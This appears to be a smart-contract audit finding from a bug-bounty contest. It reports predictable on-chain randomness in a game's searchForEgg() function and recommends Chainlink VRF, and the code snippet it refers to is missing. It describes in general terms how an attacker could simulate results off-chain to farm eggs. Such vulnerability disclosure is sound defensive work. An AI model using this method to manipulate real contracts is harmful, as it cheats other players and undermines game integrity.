Insecure Pseudo-Randomness in searchForEgg()
Summary
The game uses insecure pseudo-random number generation to determine whether a user finds an egg. This randomness is predictable and can be manipulated by attackers, especially in public or incentivized games.
Vulnerability Details
The following line of code generates a random value:
This can be manipulated:
block.timestampis controlled by miners.block.prevrandao(formerlyblock.difficulty) can also be influenced in PoS.msg.senderandeggCounterare known.
A malicious actor can call this function multiple times or simulate the result off-chain until they know an egg will be found.
Impact
Attackers can farm eggs predictably, bypassing the intended randomness.
Can lead to NFT inflation, unfair advantage, and game integrity failure.
Tools Used
Manual code review
Solidity documentation on randomness
Common blockchain attack patterns
Recommendations
Use a verifiable random function (VRF), such as Chainlink VRF, to introduce secure, unpredictable randomness:
Request randomness via Chainlink.
Handle fulfillment with an asynchronous callback to mint the egg.
Lead Judging Commences
Insecure Randomness
Insecure methods to generate pseudo-random numbers
Rewards breakdown
Live
The contest is live. Earn rewards by submitting a finding.
Appeals
This is your time to appeal against judgements on your submissions.
Appeals Review
Appeals are being carefully reviewed by our judges.